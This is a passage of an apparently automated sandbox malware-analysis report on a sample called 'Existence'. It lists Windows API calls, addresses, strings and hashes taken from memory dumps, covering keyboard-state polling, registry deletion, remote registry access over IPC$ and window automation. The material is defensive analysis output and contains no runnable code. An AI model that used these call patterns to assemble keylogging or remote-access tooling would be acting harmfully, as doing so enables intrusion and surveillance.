                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                                                                                                          • Opcode ID: 69184b53cf6e1663fcd75516106d6e7babe7e4a1fe73fe2a51bf27371f22370a
                                                                                                                                                                                          • Instruction ID: db0eefa019801db53f13359df8faedd10b709c4dfc53352ec674c673ffa7ba6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 69184b53cf6e1663fcd75516106d6e7babe7e4a1fe73fe2a51bf27371f22370a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9861A1B0900249AFDF22CF64ED89EFEBBB9FB05358F048059E911A3251D738AD11CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0079E4D4
                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0079E4FA
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079E504
                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0079E554
                                                                                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0079E570
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                                                                                                          • Opcode ID: cc7b7aa60cecbc203d574b410933715b8ed018b9ae1b991cea8181c53eab93f3
                                                                                                                                                                                          • Instruction ID: 7c7f5fefc5e08f4dde07acd88e77f798e083dfc38d75af519978257485605033
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc7b7aa60cecbc203d574b410933715b8ed018b9ae1b991cea8181c53eab93f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02411572500218FAEB10AB649C4BEFF77ACDF55711F000029FE00A6182FFBD9A15D2A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 007BD6C4
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 007BD6ED
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 007BD7A8
                                                                                                                                                                                            • Part of subcall function 007BD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 007BD70A
                                                                                                                                                                                            • Part of subcall function 007BD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 007BD71D
                                                                                                                                                                                            • Part of subcall function 007BD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007BD72F
                                                                                                                                                                                            • Part of subcall function 007BD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 007BD765
                                                                                                                                                                                            • Part of subcall function 007BD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 007BD788
                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 007BD753
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                          • API String ID: 2734957052-4033151799
                                                                                                                                                                                          • Opcode ID: a5d25771d109a4294105f4950b11ca436742ffb7d477eb45d8425f30b17df082
                                                                                                                                                                                          • Instruction ID: 080703dd155167be53c1c4bce1466d9d4ee073ea7568f869bfdecc6399df6814
                                                                                                                                                                                          • Opcode Fuzzy Hash: a5d25771d109a4294105f4950b11ca436742ffb7d477eb45d8425f30b17df082
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82318F75A01129BBDB309BA0DC88EFFBB7DEF45750F004069F905E2200EB389E459AA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • timeGetTime.WINMM ref: 0079EFCB
                                                                                                                                                                                            • Part of subcall function 0074F215: timeGetTime.WINMM(?,?,0079EFEB), ref: 0074F219
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0079EFF8
                                                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0079F01C
                                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0079F03E
                                                                                                                                                                                          • SetActiveWindow.USER32 ref: 0079F05D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0079F06B
                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0079F08A
                                                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 0079F095
                                                                                                                                                                                          • IsWindow.USER32 ref: 0079F0A1
                                                                                                                                                                                          • EndDialog.USER32(00000000), ref: 0079F0B2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                                                          • Opcode ID: 0a293fd2bdb9ababede3d2b22ae0d65d8856ef4cd6d88ae99a26f4e6c23e5d90
                                                                                                                                                                                          • Instruction ID: 8c268a69b0b0c16fd336f6039c4270e49c91024fab4b38df2c45ab39fad58a45
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a293fd2bdb9ababede3d2b22ae0d65d8856ef4cd6d88ae99a26f4e6c23e5d90
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46216D72200204BFEB616F24FC8DF26BB6EFB59745B054039F605D2272CB7E8C519A65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0079F374
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0079F38A
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0079F39B
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0079F3AD
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0079F3BE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: c71b23e16d618a8020130992d15dc282b5222b320f09c6ae93c1138524413559
• Instruction ID: 610951e53465013aa5606676f97b3ac8b322770961807472b1bdd302ddc351f9
• Opcode Fuzzy Hash: c71b23e16d618a8020130992d15dc282b5222b320f09c6ae93c1138524413559
• Instruction Fuzzy Hash: 051191B1A5016DB9EB24A665DC4AEFF7B7CEB92B40F40042AB901E21D1DAA86904C5A0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00763007
  • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
  • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
• _free.LIBCMT ref: 00763013
• _free.LIBCMT ref: 0076301E
• _free.LIBCMT ref: 00763029
• _free.LIBCMT ref: 00763034
• _free.LIBCMT ref: 0076303F
• _free.LIBCMT ref: 0076304A
• _free.LIBCMT ref: 00763055
• _free.LIBCMT ref: 00763060
• _free.LIBCMT ref: 0076306E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: &}
• API String ID: 776569668-156965433
• Opcode ID: ee1e9450e57b2769c285d60ab0c83b8b06b7da621790d3c9fef40ebc76b99ac5
• Instruction ID: 9730fb134fd5f60d9ab76ce67a09caf541bc443706f16a74be8109cf00549153
• Opcode Fuzzy Hash: ee1e9450e57b2769c285d60ab0c83b8b06b7da621790d3c9fef40ebc76b99ac5
• Instruction Fuzzy Hash: 3211A776204508FFCB41EF94C846CDD3B65EF06390B8145A5FD09DB223D736DA529B50
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetKeyboardState.USER32(?), ref: 0079A9D9
• SetKeyboardState.USER32(?), ref: 0079AA44
• GetAsyncKeyState.USER32(000000A0), ref: 0079AA64
• GetKeyState.USER32(000000A0), ref: 0079AA7B
• GetAsyncKeyState.USER32(000000A1), ref: 0079AAAA
• GetKeyState.USER32(000000A1), ref: 0079AABB
• GetAsyncKeyState.USER32(00000011), ref: 0079AAE7
• GetKeyState.USER32(00000011), ref: 0079AAF5
• GetAsyncKeyState.USER32(00000012), ref: 0079AB1E
• GetKeyState.USER32(00000012), ref: 0079AB2C
• GetAsyncKeyState.USER32(0000005B), ref: 0079AB55
• GetKeyState.USER32(0000005B), ref: 0079AB63
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 51410032a73fef5e8cc741bc252dbd183d948860ad874c4669dfe1f1de5f37f2
• Instruction ID: 721d5e51fe24e3785c303c61e6ccee7f30da162890462d632cd09659a989ae40
• Opcode Fuzzy Hash: 51410032a73fef5e8cc741bc252dbd183d948860ad874c4669dfe1f1de5f37f2
• Instruction Fuzzy Hash: B5510860A057887AFF31D764A954BEABFB59F02340F08859DD5C21A1C2DA5CAB4CC7E3
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,00000001), ref: 00796649
• GetWindowRect.USER32(00000000,?), ref: 00796662
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007966C0
• GetDlgItem.USER32(?,00000002), ref: 007966D0
• GetWindowRect.USER32(00000000,?), ref: 007966E2
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00796736
• GetDlgItem.USER32(?,000003E9), ref: 00796744
• GetWindowRect.USER32(00000000,?), ref: 00796756
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00796798
• GetDlgItem.USER32(?,000003EA), ref: 007967AB
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007967C1
• InvalidateRect.USER32(?,00000000,00000001), ref: 007967CE
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 7b388a3ca8f32a7aa4268a2eb4add5c0d4784c0f7f16630fadc7f95a3e96f9e7
• Instruction ID: a6aa1653df9fe722c06a236e312955ad6162026c3937141d71a1eaf20cf1ed28
• Opcode Fuzzy Hash: 7b388a3ca8f32a7aa4268a2eb4add5c0d4784c0f7f16630fadc7f95a3e96f9e7
• Instruction Fuzzy Hash: F251FFB1A00215AFDF18CFA8DD95AAEBBB5FB48315F10822DF519E7290D774AD04CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00731802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00731488,?,00000000,?,?,?,?,0073145A,00000000,?), ref: 00731865
• DestroyWindow.USER32(?), ref: 00731521
• KillTimer.USER32(00000000,?,?,?,?,0073145A,00000000,?), ref: 007315BB
• DestroyAcceleratorTable.USER32(00000000), ref: 007729B4
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0073145A,00000000,?), ref: 007729E2
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0073145A,00000000,?), ref: 007729F9
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0073145A,00000000), ref: 00772A15
• DeleteObject.GDI32(00000000), ref: 00772A27
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 27cf9717a3d4ed7935b502c04b06a418cebc16527be81fc7a860682237bbf174
                                                                                                                                                                                          • Instruction ID: 523eb9ab42e9da28afa20258b968b16c682cbc631340763297d78c9a572dcebf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 27cf9717a3d4ed7935b502c04b06a418cebc16527be81fc7a860682237bbf174
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11616831501711DFEB359F18D948F2ABBB1FB80322F90C129E44696672C7B8ACA1CF85
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00732234: GetWindowLongW.USER32(?,000000EB), ref: 00732242
• GetSysColor.USER32(0000000F), ref: 00732152
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: ae1d1beb06a688c4445bbf202116a781ffcf08944222706c17f92b4bf051e035
• Instruction ID: 890f3ff48b10abe0173ad28f1389690de11bf98c6d484873013aed8372fa5779
• Opcode Fuzzy Hash: ae1d1beb06a688c4445bbf202116a781ffcf08944222706c17f92b4bf051e035
• Instruction Fuzzy Hash: 1E41B431100648AFEB305F389C48FB93B65AB42770F158259FAA6872E3D7399D43EB11
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00780D31,00000001,0000138C,00000001,00000001,00000001,?,007AEEAE,00802430), ref: 0079A091
• LoadStringW.USER32(00000000,?,00780D31,00000001), ref: 0079A09A
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00780D31,00000001,0000138C,00000001,00000001,00000001,?,007AEEAE,00802430,?), ref: 0079A0BC
• LoadStringW.USER32(00000000,?,00780D31,00000001), ref: 0079A0BF
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0079A1E0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 747408836-2268648507
• Opcode ID: 9d00b80a5de131f0331c07f71a26fbc8344abc2e67e0dec10227d3de7ec3218e
• Instruction ID: 770e78a62f476783c64e0c12596a6b85b8445a772e69fb4f0e09ee6bac73e688
• Opcode Fuzzy Hash: 9d00b80a5de131f0331c07f71a26fbc8344abc2e67e0dec10227d3de7ec3218e
• Instruction Fuzzy Hash: C2412DB290011DFADF15EBE0DD4ADEEB778AF14340F504065B601B6092DB796F49CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00791093
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007910AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007910CB
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007910F5
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0079111D
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00791128
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079112D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
• Opcode ID: 86cfd76dd4b19ed302c9f6e1909e0c4293e44ef6efc170393f0a40a24757b2e0
• Instruction ID: 19ca401bf37aabd00d603c4d5cb04c470e7149b733c120bfec2d46a3129ed267
• Opcode Fuzzy Hash: 86cfd76dd4b19ed302c9f6e1909e0c4293e44ef6efc170393f0a40a24757b2e0
• Instruction Fuzzy Hash: 5141F872C1022DEBDF21EBA4EC99DEEB778FF04750F404069EA01A2161EB799E54CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007C4AD9
• CreateCompatibleDC.GDI32(00000000), ref: 007C4AE0
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007C4AF3
• SelectObject.GDI32(00000000,00000000), ref: 007C4AFB
• GetPixel.GDI32(00000000,00000000,00000000), ref: 007C4B06
• DeleteDC.GDI32(00000000), ref: 007C4B10
• GetWindowLongW.USER32(?,000000EC), ref: 007C4B1A
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 007C4B30
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 007C4B3C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: f2229b2c6725429c646a6e27abbc905d84454174247f78455a1760e7f34ba8c5
• Instruction ID: b1201152f70ab54aea04a5fe27c860114f1648bb705e402d18fab3089b2fd71d
• Opcode Fuzzy Hash: f2229b2c6725429c646a6e27abbc905d84454174247f78455a1760e7f34ba8c5
• Instruction Fuzzy Hash: C7313C72140219BBDF219F64DC08FDA3BA9FF09364F11422DFA15A61A0D779DC60DB98
Uniqueness
Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(?), ref: 007B46B9
• CoInitialize.OLE32(00000000), ref: 007B46E7
• CoUninitialize.OLE32 ref: 007B46F1
• _wcslen.LIBCMT ref: 007B478A
• GetRunningObjectTable.OLE32(00000000,?), ref: 007B480E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 007B4932
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 007B496B
• CoGetObject.OLE32(?,00000000,007D0B64,?), ref: 007B498A
• SetErrorMode.KERNEL32(00000000), ref: 007B499D
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007B4A21
• VariantClear.OLEAUT32(?), ref: 007B4A35
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: 2c3a7d24c227044a0243527a65f83f49166294592dd3425d6031686b0b1d1e7a
